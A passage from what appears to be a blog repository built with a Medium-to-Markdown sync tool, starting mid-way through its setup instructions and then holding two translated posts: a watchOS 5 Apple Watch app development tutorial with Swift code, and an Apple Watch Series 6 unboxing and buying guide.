8. The `Automatic Build` and `pages-build-deployment` actions will also need to finish before making any further changes; they will start automatically once the ZMediumToMarkdown action has completed.
9. Go to the `Settings` section of your GitHub repository and select `Pages`. In the `Branch` field, select `gh-pages`, and leave `/(root)` selected as the default. Click `Save`; you can also find the URL for your GitHub page at the top of the page.
10. Wait for the `Pages build and deployment` action to finish.

*To avoid expected Git conflicts or unexpected errors, please follow the steps carefully and in order, and be patient while waiting for each action to complete.
*Note that the first time running may take longer.
*If you open the URL and notice that something is wrong, such as the web style being missing, please ensure that your configuration in the _config.yml file is correct.
*Please refer to the 'Things to Know' and 'Troubleshooting' sections below for more information.
```yaml
medium_username: # enter your username on Medium.com
```
Please specify your Medium username for automatic download and syncing of your posts.
For more information, please refer to jekyll-theme-chirpy or jekyllrb .
You can configure the time interval for syncing in ./.github/workflows/ZMediumToMarkdown.yml
.
The default time interval for syncing is once per day.
You can also manually run the ZMediumToMarkdown action by going to the Actions
tab in your GitHub repository, selecting the ZMediumToMarkdown
action, clicking on the Run workflow
button, and selecting the main
branch.
All content downloaded using ZMediumToMarkdown, including but not limited to articles, images, and videos, are subject to copyright laws and belong to their respective owners. ZMediumToMarkdown does not claim ownership of any content downloaded using this tool.
Downloading and using copyrighted content without the owner’s permission may be illegal and may result in legal action. ZMediumToMarkdown does not condone or support copyright infringement and will not be held responsible for any misuse of this tool.
Users of ZMediumToMarkdown are solely responsible for ensuring that they have the necessary permissions and rights to download and use any content obtained using this tool. ZMediumToMarkdown is not responsible for any legal issues that may arise from the misuse of this tool.
By using ZMediumToMarkdown, users acknowledge and agree to comply with all applicable copyright laws and regulations.
- After each sync, the `Pages build and deployment` and `Automatic Build` actions run; you can check their progress on the `Actions` tab.
- Your GitHub Pages URL can be found in `Settings -> Pages`.
- The `ZMediumToMarkdown` GitHub Action for syncing Medium posts will automatically run every day by default, and you can also manually trigger it on the GitHub Actions page or adjust the sync frequency as needed.
- Each sync also triggers the `Automatic Build` & `Pages build and deployment` actions; please wait for them to finish before checking the final result.
- You can add your own posts to the `_posts` directory by naming the file `YYYY-MM-DD-POSTNAME`; lowercase file names are recommended.
- Static assets live in the `/assets` directory.
- You can edit `tools/optimize_markdown.rb` and uncomment lines 10–12 to automatically remove the ZMediumToMarkdown watermark at the end of all posts during Jekyll build time.

If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Step-by-step development of an Apple Watch App from scratch with watchOS 5
It’s been almost three months since my last Apple Watch Unboxing, and I finally found the opportunity to explore developing an Apple Watch App.
Wedding App — The Largest Wedding Planning App
Here are my thoughts after using it for three months:
Overall, after three months of use, it still feels like a little life assistant, helping you with trivial matters, just as I wrote in the original unboxing article.
Before I actually developed an Apple Watch App, I was puzzled as to why the apps on Apple Watch were so basic, even just “usable,” including LINE (messages not synced and never updated), Messenger (just usable); until I actually developed an Apple Watch App and understood the developers’ difficulties…
The positioning of the Apple Watch is “not to replace the iPhone, but to assist”. This is the direction of official introductions, official apps, and watchOS APIs; hence, third-party apps feel basic and have limited functionality (sorry, I was too greedy Orz).
Take our app as an example, it has features like searching for vendors, viewing columns, discussion forums, online inquiries, etc.; online inquiries are valuable to bring to the Apple Watch because they require real-time and faster responses, which increases the chance of getting orders. Searching for vendors, viewing columns, and discussion forums are relatively complex features, and even if they can be done on the watch, it doesn’t make much sense (the screen can display too little information, and they don’t require real-time responses).
The core concept is still “assistive,” so not every feature needs to be brought to the Apple Watch; after all, users rarely have only the watch without the phone, and in such cases, the user’s needs are only for important features (like viewing column articles, which is not important enough to need to be viewed immediately on the watch).
This is also my first time developing an Apple Watch App, the content of the article may not be in-depth enough, please give me your advice!!
This article is only suitable for readers who have developed iOS Apps/UIKit basics
This article uses: iOS ≥ 9, watchOS ≥ 5
File -> New -> Target -> watchOS -> WatchKit App
*Apple Watch Apps cannot be installed independently, they must be attached to an iOS App
After creating it, the directory will look like this:
You will find two Target items, both indispensable:
Details will be introduced later, for now, just get a general understanding of the directory and file content functions.
In Apple Watch, the view controller is not called ViewController but InterfaceController. You can find the Interface Controller Scene in WatchKit App/Interface.storyboard, and the program that controls it is in WatchKit Extension/InterfaceController.swift (same concept as iOS)
The Scene is initially squeezed together with the Notification Controller Scene (I will pull it up a bit to separate them)
You can set the title display text of the InterfaceController on the right.
The title color part is set by Interface Builder Document/Global hint, the style color of the entire App will be unified.
There are not many complex components, and the functions of the components are simple and clear.
A tall building starts from the View. The layout part does not have Auto Layout, constraints, or layers like in UIKit (iOS). All layout settings are done using parameters, which is simpler and more powerful (the layout is somewhat like UIStackView in UIKit).
All layouts are composed of Groups, similar to UIStackView in UIKit but with more layout parameters
Group parameter settings:
You can directly apply the system’s Text Styles or use Custom (but I found that using Custom couldn’t set the font size); so I used System to customize the font size for each display Label.
The layout is not as complicated as iOS, so I’ll demonstrate it directly through an example for you to get started quickly; using Line’s homepage layout as an example:
In WatchKit App/Interface.storyboard, find the Interface Controller Scene:
Like UIKit UITableView, there is the Table itself and the Cell (called Row in Apple Watch); it is much simpler to use, you can directly design the layout of the Cell in this interface!
To create a layout with a rounded full-width Image on the left and a stacked Label, and two evenly divided blocks on the right, with a Label on the top and another Label on the bottom.
2-1: Create the structure of the left and right blocks
Drag two Groups into the Group and set the Size parameters respectively:
Left green part:
Layout setting Overlap, the sub-View inside needs to stack the unread message Label
Set a fixed square with a width and height of 40
Right red part:
Layout setting Vertical, the sub-View inside needs to display two items vertically
Width is set relative to the outer container: 100% of the container width minus the 40 of the left green part
Layout inside the left and right containers:
Left part: Drag in an Image, then drag in a Group containing a Label and align it to the bottom right (set the Group background color, spacing, and rounded corners)
Right part: Drag in two Labels, one aligned to the top left and the other aligned to the bottom left.
Select Row -> Identifier -> Enter custom name
Very simple, just drag another Row into the Table (which Row style to display is controlled by the program) and enter the Identifier name.
Here I drag another Row for displaying a no data prompt.
WatchKit’s hidden does not occupy space, so it can be used for interactive scenarios (show the Table when logged in; show the prompt Label when not logged in), as sketched below.
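For example, a minimal sketch of that toggle (the outlet names contactTable and notLoggedInLabel are hypothetical, not from the project above):

// Toggle visibility based on login state; setHidden(true) also frees up the space.
func updateVisibility(isLoggedIn: Bool) {
    contactTable.setHidden(!isLoggedIn)
    notLoggedInLabel.setHidden(isLoggedIn)
}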
The layout is now complete, you can modify it according to your design; it’s easy to get started, practice a few more times, and play with the alignment parameters to get familiar!
Continuing with Row, we need to create a Class to reference the Row:
class ContactRow: NSObject {
}
class ContactRow: NSObject {
    var id: String?
    @IBOutlet var unReadGroup: WKInterfaceGroup!
    @IBOutlet var unReadLabel: WKInterfaceLabel!
    @IBOutlet weak var imageView: WKInterfaceImage!
    @IBOutlet weak var nameLabel: WKInterfaceLabel!
    @IBOutlet weak var timeLabel: WKInterfaceLabel!
}
Connect the outlets and add a stored id variable.
For the Table part, also pull the Outlet to the Controller:
import WatchKit
import Foundation

class InterfaceController: WKInterfaceController {

    @IBOutlet weak var Table: WKInterfaceTable!

    struct ContactStruct {
        var name: String
        var image: String
        var time: String
    }

    override func awake(withContext context: Any?) {
        super.awake(withContext: context)
        // Configure interface objects here.
    }

    override func willActivate() {
        // This method is called when the watch view controller is about to be visible to the user
        super.willActivate()
        loadData() // Load (or reload) the Table data whenever the page becomes visible
    }

    override func didDeactivate() {
        // This method is called when the watch view controller is no longer visible
        super.didDeactivate()
    }

    func loadData() {
        // Get API callback...
        // postData {
        let data: [ContactStruct] = [] // data returned by the API...

        self.Table.setNumberOfRows(data.count, withRowType: "ContactRow")
        // If you have multiple Row types to present, use:
        // self.Table.setRowTypes(["ContactRow", "ContactRow2", "ContactRow3"])

        for item in data.enumerated() {
            if let row = self.Table.rowController(at: item.offset) as? ContactRow {
                row.nameLabel.setText(item.element.name)
                // assign values to the labels/image...
            }
        }
        // }
    }

    // Handle Row selection:
    override func table(_ table: WKInterfaceTable, didSelectRowAt rowIndex: Int) {
        guard let row = table.rowController(at: rowIndex) as? ContactRow, let id = row.id else {
            return
        }
        self.pushController(withName: "showDetail", context: id)
    }
}
The operation of the Table is greatly simplified without delegate/datasource. To set the data, just call setNumberOfRows/setRowTypes to specify the number and type of rows, then use rowController(at:) to set the data content for each row!
The row selection event of the Table only requires overriding func table(_ table: WKInterfaceTable, didSelectRowAt rowIndex: Int) to operate! (Table only has this event)
First, set the Identifier for the Interface Controller
WatchKit has two navigation modes:
Push method allows returning from the top left
Return to the previous page same as iOS UIKit: self.pop()
Return to the root page: self.popToRootController()
Open a new page: self.presentController()
Or in the Storyboard, on the Interface Controller of the first page, Control+Click and drag to the second page and select “next page”
Tab display mode allows switching pages left and right
The two navigation methods cannot be mixed.
Unlike iOS, where you need custom delegates or segues to pass parameters, in WatchKit you can pass parameters by placing them in the context of the above methods.
Receive parameters in the InterfaceController’s awake(withContext context: Any?)
For example, if I want to navigate from page A to page B and pass an id: Int:
Page A:
self.pushController(withName: "showDetail", context: 100)
Page B:
override func awake(withContext context: Any?) {
    super.awake(withContext: context)
    guard let id = context as? Int else {
        print("Parameter error!")
        self.popToRootController()
        return
    }
    // Configure interface objects here using the received id.
}
Compared to iOS UIKit, the API surface is greatly simplified, and those who have developed for iOS should get the hang of it quickly. For example, setting a label’s text becomes setText(). P.S. Surprisingly, there is no getText method; you can only keep the value yourself (via an extension or an external stored variable), as sketched below.
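For instance, a minimal sketch of the stored-variable approach (TrackedLabel is a hypothetical helper, not part of WatchKit):

import WatchKit

// Hypothetical helper: WKInterfaceLabel has no getter, so remember the last
// value that was set and forward it to the real label.
final class TrackedLabel {
    private(set) var text: String?
    private let label: WKInterfaceLabel

    init(label: WKInterfaceLabel) {
        self.label = label
    }

    func setText(_ text: String?) {
        self.text = text
        label.setText(text)
    }
}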
If you have developed iOS-related Extensions, you might instinctively use App Groups to share UserDefaults. I was excited to do this initially, but I got stuck for a long time and found that the data never transferred. After checking online, I found that since watchOS 2, this method is no longer supported…
You need to use the new WatchConnectivity method to communicate between the phone and the watch (similar to the socket concept). Both the iOS phone and the watchOS watch need to implement it. We write it in a singleton pattern as follows:
Mobile:
import Foundation
import WatchConnectivity

class WatchSessionManager: NSObject, WCSessionDelegate {

    static let sharedManager = WatchSessionManager()
    private override init() {
        super.init()
    }

    private let session: WCSession? = WCSession.isSupported() ? WCSession.default : nil
    private var validSession: WCSession? {
        if let session = session, session.isPaired && session.isWatchAppInstalled {
            return session
        }
        // Return a valid session: paired and with the watch app installed
        return nil
    }

    // Keep a reference to the in-flight transfer so it can be cancelled and replaced
    private var userDefaultsTransfer: WCSessionUserInfoTransfer?

    func startSession() {
        session?.delegate = self
        session?.activate()
    }

    @available(iOS 9.3, *)
    func session(_ session: WCSession, activationDidCompleteWith activationState: WCSessionActivationState, error: Error?) {
        // Phone-side session activation completed
    }

    func session(_ session: WCSession, didReceiveUserInfo userInfo: [String: Any] = [:]) {
        // Phone received UserInfo from the watch
    }

    func session(_ session: WCSession, didReceiveMessage message: [String: Any], replyHandler: @escaping ([String: Any]) -> Void) {
        // Phone received a Message from the watch
    }

    // Additionally, didReceiveMessageData and didReceive (file) also handle data received from the watch;
    // decide which one to use based on your data transfer and reception needs.

    func sendUserInfo() {
        guard let validSession = self.validSession, validSession.isReachable else {
            return
        }

        if userDefaultsTransfer?.isTransferring == true {
            userDefaultsTransfer?.cancel()
        }

        var list: [String: Any] = [:]
        // Add the UserDefaults values to sync into the list...

        self.userDefaultsTransfer = validSession.transferUserInfo(list)
    }

    func sessionReachabilityDidChange(_ session: WCSession) {
        // The connection status with the watch app changed (the watch app was opened/closed);
        // when the watch app becomes reachable, sync the UserDefaults once.
        sendUserInfo()
    }

    func session(_ session: WCSession, didFinish userInfoTransfer: WCSessionUserInfoTransfer, error: Error?) {
        // Finished syncing UserDefaults (transferUserInfo)
    }

    func sessionDidBecomeInactive(_ session: WCSession) {

    }

    func sessionDidDeactivate(_ session: WCSession) {

    }
}
WatchConnectivity Code for iPhone
Add WatchSessionManager.sharedManager.startSession() in application(_ application: UIApplication, didFinishLaunchingWithOptions launchOptions: [UIApplicationLaunchOptionsKey: Any]?) of iOS/AppDelegate.swift to connect the session after the iPhone app launches.
For Watch:
import Foundation
import WatchConnectivity

class WatchSessionManager: NSObject, WCSessionDelegate {

    static let sharedManager = WatchSessionManager()
    private override init() {
        super.init()
    }

    private let session: WCSession? = WCSession.isSupported() ? WCSession.default : nil

    func startSession() {
        session?.delegate = self
        session?.activate()
    }

    func session(_ session: WCSession, activationDidCompleteWith activationState: WCSessionActivationState, error: Error?) {
    }

    func sessionReachabilityDidChange(_ session: WCSession) {
        guard session.isReachable else {
            return
        }
    }

    func session(_ session: WCSession, didFinish userInfoTransfer: WCSessionUserInfoTransfer, error: Error?) {

    }

    func session(_ session: WCSession, didReceiveUserInfo userInfo: [String: Any] = [:]) {
        DispatchQueue.main.async {
            // Write the received values into UserDefaults here:
            // print(userInfo)
        }
    }
}
WatchConnectivity Code for Watch
Add WatchSessionManager.sharedManager.startSession() in applicationDidFinishLaunching() of WatchOS Extension/ExtensionDelegate.swift to connect the session after the Watch app launches.
To send data: sendMessage, sendMessageData, transferUserInfo, transferFile
To receive data: didReceiveMessageData, didReceive, didReceiveMessage
The methods for sending and receiving data are the same on both ends.
You can see that data transfer from the watch to the phone works, but data transfer from the phone to the watch is limited to when the watch app is open.
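For example, a minimal sendMessage sketch on the phone side (it reuses validSession from the WatchSessionManager above; the "ping" payload is just a placeholder):

// Immediate messaging only works while the counterpart app is reachable;
// for queued delivery, use transferUserInfo instead.
func sendPing() {
    guard let validSession = self.validSession, validSession.isReachable else {
        return
    }
    validSession.sendMessage(["ping": Date().timeIntervalSince1970],
                             replyHandler: { reply in print("Reply:", reply) },
                             errorHandler: { error in print("Send failed:", error) })
}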
The PushNotificationPayload.apns file in the project directory comes in handy for testing push notifications on the simulator. Deploy the Watch App target to the simulator; after installation, launching the app will receive a push notification with the content of this file, making it easier to test push notification functionality.
To modify/enable/disable PushNotificationPayload.apns, select the Target and then Edit Scheme.
watchOS Push Notification Handling:
Similar to iOS where we implement UNUserNotificationCenterDelegate, in watchOS we also implement the same methods in watchOS Extension/ExtensionDelegate.swift
import WatchKit
import UserNotifications
import WatchConnectivity

class ExtensionDelegate: NSObject, WKExtensionDelegate, UNUserNotificationCenterDelegate {

    func applicationDidFinishLaunching() {
        WatchSessionManager.sharedManager.startSession() // The WatchConnectivity connection mentioned earlier

        UNUserNotificationCenter.current().delegate = self // Set the UNUserNotificationCenter delegate
        // Perform any final initialization of your application.
    }

    func userNotificationCenter(_ center: UNUserNotificationCenter, willPresent notification: UNNotification, withCompletionHandler completionHandler: @escaping (UNNotificationPresentationOptions) -> Void) {
        completionHandler([.sound, .alert])
        // As on iOS, this allows push notifications to be displayed even when the app is in the foreground
    }

    func userNotificationCenter(_ center: UNUserNotificationCenter, didReceive response: UNNotificationResponse, withCompletionHandler completionHandler: @escaping () -> Void) {
        // Called when the push notification is tapped
        guard let info = response.notification.request.content.userInfo["aps"] as? NSDictionary,
              let alert = info["alert"] as? [String: String],
              let data = info["data"] as? [String: String] else {
            completionHandler()
            return
        }

        // response.actionIdentifier identifies which action was tapped
        // Default tap action: UNNotificationDefaultActionIdentifier

        if alert["type"] == "new_ask" {
            WKExtension.shared().rootInterfaceController?.pushController(withName: "showDetail", context: 100)
            // Get the current root interface controller and push
        } else {
            // Other handling...
            // WKExtension.shared().rootInterfaceController?.presentController(withName: "", context: nil)
        }

        completionHandler()
    }
}
ExtensionDelegate.swift
watchOS push notification display is divided into three types:
It works together with the phone’s push notifications: here the iOS side has already implemented UNUserNotificationCenter.setNotificationCategories to add action buttons below the notification, and by default the Apple Watch will display them as well.
You can set the push notification handling method in the Static Notification Interface Controller Scene in Interface.storyboard
There’s not much to say about static; it just follows the default display. Let’s first look at dynamic: after checking “Has Dynamic Interface,” a “Dynamic Interface” scene appears where you can design your custom push notification presentation (Buttons cannot be used):
My custom push notification presentation design
import WatchKit
import Foundation
import UserNotifications

class NotificationController: WKUserNotificationInterfaceController {

    @IBOutlet var imageView: WKInterfaceImage!
    @IBOutlet var titleLabel: WKInterfaceLabel!
    @IBOutlet var contentLabel: WKInterfaceLabel!

    override init() {
        // Initialize variables here.
        super.init()
        self.setTitle("結婚吧") // Set the title at the top right
        // Configure interface objects here.
    }

    override func willActivate() {
        // This method is called when the watch view controller is about to be visible to the user
        super.willActivate()
    }

    override func didDeactivate() {
        // This method is called when the watch view controller is no longer visible
        super.didDeactivate()
    }

    override func didReceive(_ notification: UNNotification) {
        // This method is called when a notification needs to be presented.
        // Implement it if you use a dynamic notification interface.
        // Populate your dynamic notification interface as quickly as possible.

        if #available(watchOSApplicationExtension 5.0, *) {
            self.notificationActions = []
            // Clear the buttons added below the notification by the iOS side's UNUserNotificationCenter.setNotificationCategories
        }

        guard let info = notification.request.content.userInfo["aps"] as? NSDictionary,
              let alert = info["alert"] as? [String: String] else {
            return
        }
        // Push notification payload

        self.titleLabel.setText(alert["title"])
        self.contentLabel.setText(alert["body"])

        if #available(watchOSApplicationExtension 5.0, *) {
            if alert["type"] == "new_msg" {
                // If it is a new-message notification, add a Reply button below the notification
                self.notificationActions = [UNNotificationAction(identifier: "replyAction", title: "Reply", options: [.foreground])]
            } else {
                // Otherwise, add a View button
                self.notificationActions = [UNNotificationAction(identifier: "openAction", title: "View", options: [.foreground])]
            }
        }
    }
}
For the code part, similarly, drag the outlets to the controller and implement the functionality.
Next, let’s talk about interactive, which is like dynamic but lets you add more buttons, controlled by the same class as dynamic. I didn’t use interactive because I added my buttons via self.notificationActions instead; the difference is as follows:
Left uses interactive, right uses self.notificationActions
Both methods require watchOS ≥ 5 support.
When buttons are added via self.notificationActions, the button events are handled by userNotificationCenter(_ center: UNUserNotificationCenter, didReceive response: UNNotificationResponse, withCompletionHandler completionHandler: @escaping () -> Void) in ExtensionDelegate, and the actions are distinguished by their identifier, for example:
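A minimal sketch of that branching (a helper you could call from the didReceive response handler shown earlier; the identifiers match the ones set above):

// Inside ExtensionDelegate, which already imports UserNotifications.
func handleAction(for response: UNNotificationResponse) {
    switch response.actionIdentifier {
    case "replyAction":
        // The Reply button added via notificationActions was tapped
        print("Reply tapped")
    case "openAction":
        // The View button was tapped
        print("View tapped")
    case UNNotificationDefaultActionIdentifier:
        // The notification body itself was tapped
        print("Notification tapped")
    default:
        break
    }
}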
Drag Menu from the component library, then drag Menu Item, and then drag IBAction to the program control
It will appear when you press hard on the page:
Use the built-in presentTextInputController method!
@IBAction func replyBtnClick() {
    // `target` is assumed to be a stored property of the controller (e.g. the conversation to reply to)
    guard let target = target else {
        return
    }

    self.presentTextInputController(withSuggestions: ["I'll reply later", "Thank you", "Feel free to contact me", "Okay", "OK!"], allowedInputMode: WKTextInputMode.plain) { (results) in

        guard let results = results else {
            return
        }
        // Called when there is input

        let txts = results.compactMap { $0 as? String }.filter { !$0.isEmpty }
        // Preprocess the input: keep only non-empty strings

        txts.forEach { (txt) in
            print(txt)
            // e.g. send the reply text for `target` to the server
        }
    }
}
Thank you for reading this! You’ve worked hard!
This concludes the article. It briefly covered UI layout, programming, push notifications, and interface applications. For those who have developed for iOS, getting started is really quick; it is almost the same, and many APIs have been simplified to be more concise. However, what you can do has indeed decreased (for example, I currently don’t know how to implement load-more for a Table); there is very little you can do for now, and I hope Apple will open up more APIs for developers in the future ❤️❤️❤️
Deploying Apple Watch App Target to the watch is really slow — Narcos
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Apple Watch Series 6 Unboxing and Buying Guide & Two-Year Usage Experience Summary
Time flies, it’s been two years since the last unboxing article of Apple Watch Series 4; in terms of functionality, Series 4 is more than enough without the need for an upgrade. Series 5/Series 6 don’t have any core breakthrough features, they are nice to have but not necessary.
However, due to the news about Little Ghost, I decided to give my original Series 4 LTE version to my family. The LTE version can make emergency calls without the need for a phone nearby, making it safer compared to the GPS version.
My personal habit is to wear it when going out and take it off to charge when I get home, so I don’t have the sleep experience part.
I bought the LTE version of Series 4, but since I always carry my phone with me, there’s no need to pay an extra $199 monthly fee to activate it. Moreover, replying to messages on the watch is cumbersome, and answering calls requires AirPods for convenience. Additionally, Spotify on the watch is purely a playback controller and cannot play independently from the iPhone (only Apple Music/KKBOX can).
and… I am an iOS APP / watchOS APP developer
[2020–10–24 Update]: Spotify now supports independent playback. In the watch Spotify APP, select the playback device -> Apple Watch -> connect Bluetooth earphones -> and you can play! (Still doesn’t support offline download playback, requires an internet connection to use).
Let’s get straight to the main event.
This time I chose the GPS 44mm aluminum version in Cypress Green (military green), matching my iPhone 11 Pro in military green.
I didn’t catch the first batch of purchases, I ordered on the night of 9/15:
Apple Watch + RhinoShield Protective Case Set
Flip to the back, unboxing!
The entire unboxing process doesn’t require a knife, just tear it all the way.
Open!
One strap and one body.
The packaging thickness of this generation has significantly reduced (the “tofu block” power adapter is no longer included).
Body unboxing
Only includes magnetic charging cable.
Close-up of the device
This time, the protective material of the device is made of paper. I remember the previous generation was black velvet.
Unboxing the strap
Assembly!
Back view
When assembling, you can first install the upper part of the strap and then remove the paper protective cover to avoid slipping.
Apple Watch 6 + iPhone 11 Pro
with Olaf Chicken
Swimming Ring Chicken
Apple Watch 6 with RhinoShield case
Blood oxygen test
Playing with the main feature of this generation.
Always-on display sleep vs active
It’s great that the screen doesn’t turn off now. No need to raise your wrist and wait for the screen to light up to check messages!
Unboxing ends.
Summarizing the feelings of using it for two years and my own purchasing guide.
Apple Watch serves as an extension of the phone, acting as a buffer between the phone and the person. Currently, our reliance on electronic products is directly facing the phone and the overwhelming notifications.
I don’t know if you feel the same way, but phone notifications can be startling, even the sound of vibrations. Sometimes, receiving a notification makes my heart skip a beat. Then, I instinctively take out my phone to check it, handle important matters, and put the phone away if it’s not important. This process repeats daily…
Although you can turn off sound notifications, disable vibrations in silent mode, or even turn off all notifications, you might miss important messages, leading to another kind of anxiety where you constantly check your phone.
In this situation, Apple Watch can act as a lubricant, adding a filter between the person and the phone. When wearing the watch and the phone is in sleep mode, only the watch will notify you. You can set specific app notifications to be sent to the watch and disable sound/vibration for certain apps.
You might say these settings are similar to the phone, but in terms of experience, the watch’s sound/vibration is gentler and less intrusive. Even if you turn off sound/vibration, you can quickly check for notifications by raising your wrist.
The enhancement in daily experience and increased focus comes from quickly reviewing notifications on the watch and deciding whether to continue the current task or take out the phone to handle the message. The interruption time is very short (just the time to look at the watch), avoiding distractions from constantly taking out the phone and increasing work efficiency.
Using the exclusive “Fitness” app available only with Apple Watch, you can record your daily life, including daily activity levels, walking, heart rate, and exercise records. It provides detailed health information and statistics on activity levels. Socially, you can compete with friends on activity levels and unlock badges, increasing motivation for exercise.
However, exercise depends on the person. Those who exercise will continue to do so, and those who don’t won’t start just because of the watch. It mainly adds fun and records to the exercise routine.
You don’t need to take out your phone; just double-click the watch to make a payment, which is very convenient. Especially when your hands are full, and you can’t reach into your pocket to get your phone. You can also install invoice apps that support Apple Watch, open the barcode for the cashier to scan, and then double-click to call out Apple Pay for payment.
My personal habit is to use the phone widget to let the cashier scan the barcode or membership code (like 7-Eleven/FamilyMart, as they don’t provide Apple Watch apps), and then quickly double-click the watch to call out Apple Pay, using the same hand for payment.
Store inside, no receipt needed.
You can change the watch face and strap according to your mood; a few watch faces for work, a few for holidays; bought four straps in the past two years… leather, metal, woven, and even protective case color changes… to match your outfits.
I am very used to checking the current weather conditions and the probability of rain on the watch; it’s clear at a glance. Using the phone, I have to click through several layers to see the information I want.
The countdown timer and alarm are also features I love to use. You can quickly start the countdown timer on the watch, and when the timer or alarm goes off while wearing the watch, it will notify you through the watch (if the watch is on silent mode, it will vibrate to remind you).
I find it very comfortable, especially when I want to take a short nap and am afraid that the alarm sound or phone vibration will disturb other colleagues.
It’s quite useful when riding a scooter; you can directly view the route map, and get route/turn vibration prompts. However, the downside is that the map is not optimized for scooters, so you need to pay attention to roads where scooters are prohibited. The route planning ability is average.
View route map on the watch
Google Maps recently returned to Apple Watch, but you can’t directly view the route map, only text navigation prompts.
Since everyone is paying a lot of attention to this feature recently, I specifically listed it to share my personal experience. Once, when I was getting on a bus, I quickly and forcefully pushed against the seat with my left hand, successfully triggering the fall detection. The watch will first vibrate continuously and emit a sound to call you, checking if you are conscious. If you don’t respond within 30 seconds, it will call emergency services and notify the set emergency contacts.
Apple Watch Fall Detection Test, calls 119 for rescue in 1 minute.
- Before watchOS 5, fall detection was only enabled by default for those over 65 years old; it was disabled by default for those under 65. You can check the settings for this.
- Multiple emergency contacts can be specified, and need to be set in advance.
For those who have read the previous unboxing article, that article included unboxing, usage instructions, and some app recommendations. Honestly, I later deleted most of them, keeping only the built-in apps and some commonly used communication software. Initially, you might install a bunch of apps out of novelty, but later you won’t use them much.
To be honest, when you need complex operations, you’ll use your phone. The watch is really just for quick access.
As mentioned earlier, the functionality and product positioning of Series 4 and Series 6 have not changed; they are extensions of the iPhone, not replacements. There have been no breakthrough features in the past two years, and the battery life still requires daily charging.
In terms of third-party apps, not many have been added in the past two years, but there is a growing trend. Line and Google Maps have recently updated to enhance their Apple Watch apps, so they haven’t been forgotten.
I previously wrote an article sharing my experience of developing an Apple Watch app based on watchOS 5. You can see that the official features available for development are limited (still about the same now), so third-party developers have limited room to innovate, resulting in fewer apps.
Currently updated to watchOS 7, with an annual update cycle like iOS.
watchOS 6: Added environmental noise detection, menstrual cycle tracking (suitable for female users), and walkie-talkie feature.
watchOS 7: Added sleep tracking, handwashing timer assistance, and family sharing features.
I have personally experienced this feature by giving my original Series 4 watch to a family member. You can refer to this unboxing video. This feature binds the watch to your phone, and the watch needs to be nearby to change settings. After completing the setup process, some settings cannot be adjusted without resetting, and the shared family member can only use it, not customize it.
The benefit is that the wearer doesn’t necessarily have to be an iPhone user!
According to official information, this feature is only available for LTE versions of Series 4 and later models!
I think 80% of the friends who see this are already inclined to buy it; I believe if you are a tech enthusiast, it’s worth buying to play with. If a watch is an accessory for you, you can get a more beautiful one for the same price. If you are buying it solely for sports, there are better sports watches to consider. The Apple Watch is designed for comprehensive needs and enhanced experiences.
The performance is sufficient to last another 3-5 years. If you have the budget, of course, buy new rather than old. For value for money, you can buy the SE. If the budget is limited, you can buy a second-hand Series 4/5/LTE version, which is easier to get.
Apple Watch can only pair with iPhone (Android phones and iPads are not compatible). Also, consider the current iOS version of your phone. watchOS 7 is only compatible with iOS ≥ 14 (watchOS 6 => iOS ≥ 13/watchOS 5 => iOS ≥ 12)
The iPhone must be upgraded to the corresponding minimum iOS version to pair and use.
Series 6 / SE does not come with a charging adapter.
The Family Setup feature of watchOS 7 (which allows you to check the status of children and the health of the elderly) is only available for Series 4 and above or SE versions.
Stainless Steel Version (Thanks to a colleague for the support)
It depends on how you position this watch. If it’s for novelty and fun, aluminum is fine. If you want to enhance the accessory attribute, buy the stainless steel or above versions, which are more beautiful and easier to match.
The aluminum version has more demand in the second-hand market, making it easier to sell when a new generation comes out (I could still sell my Series 4 for 7-8 thousand).
The aluminum version’s body and glass are more fragile, and the screen glass is not scratch-resistant. It is recommended to buy a protective case and a full-coverage screen protector.
Protective case (about $400) + screen protector, it is recommended to find a hydrogel or jelly protector (about $800), otherwise, it is easy to encounter fitting problems; the total cost is about +$1500, and the aluminum version can also have complete protection.
Additionally, a lesson learned from experience: if you have a screen protector, you must buy a protective case, otherwise, the edges are easily damaged (I had to replace three protectors because of this, costing nearly $3000). The screen protector must be a good one that fits well, or it will be very difficult to use, which is a waste of money.
HAO Jelly Full-Coverage Glass Screen Protector from Xiao Hao Wrap
Fully transparent & fully adhesive, does not affect smooth sliding and display.
RhinoShield + Screen Protector
The screen will become slightly thicker, so the inner frame may float a bit (depending on the tolerance of the protective case), but the clips still fit in.
Xiao Hao Wrap suggests not to use the inner frame of RhinoShield as it may easily press against the screen protector, just use the outer frame. However, my Series 4 has been in this state for two years without any issues, so you can decide for yourself.
It depends on the thickness of your wrist. Generally, men are recommended to wear 44mm, as 40mm might look a bit odd.
If you are buying aluminum + protective case, consider whether the size with the protective case will be too large.
Considering that I didn’t use LTE much before, I opted for the GPS version this time, saving $3000.
Whether to choose GPS or LTE depends not only on whether you will have scenarios where you go out wearing only the watch, but also on the fall detection alarm function everyone has been caring about recently. The GPS version can only place an emergency call when the phone is nearby or the watch can connect to a known WiFi network (if neither condition is met, it cannot send the alarm); the LTE version can operate independently, making it relatively safer. Communication between the phone and the watch is the same either way: the GPS version, or an LTE version that has not been activated, communicates through the nearby phone or through a WiFi network the watch can join.
The watch being able to connect to the current network environment WiFi means that the phone and watch have previously connected to this WiFi, and the system has a record to connect directly.
watchOS 7’s Family Setup feature (can check children’s whereabouts, elderly health status) is only available on the LTE version because the watch’s data is sent back to the setup person (parent) rather than the wearer’s phone.
Watch bands are only categorized by case size (the 38/40mm sizes share bands, and the 42/44mm sizes share bands).
And Apple guarantees that the band sizes will not change (otherwise, who would buy the Hermès version XD). At least for now, bands from generations 1 to 6 are interchangeable.
Unboxing of the Apple Watch Original Stainless Steel Milanese Loop
The Nike edition only has an exclusive Nike watch face, while the Hermès edition not only has an exclusive Hermès watch face but also comes with a Hermès band paired with the stainless steel version.
If you currently have a Series 3/Series 2/Series 1, it is recommended to upgrade, at least to Series 4; starting from Series 4, the screen becomes full-screen (many new watch faces require Series 4 or above), the processor performance is much better and almost never lags, making the upgrade noticeable.
Series 4 can be upgraded or not, as the main differences are the always-on display and the blood oxygen sensor. The Apple Watch’s raise-to-wake display is fast and responsive enough, and while the always-on display is better, it’s not a must-have; the blood oxygen sensor is not medically certified and is for reference only.
If you already have a Series 5, you can wait for the next generation, as there is no need to upgrade.
For a detailed comparison, refer to the official website’s Compare All Models, which also highlights some minor functional differences, such as the altimeter, compass, etc.
If you have any questions or comments, feel free to contact me.
===
===
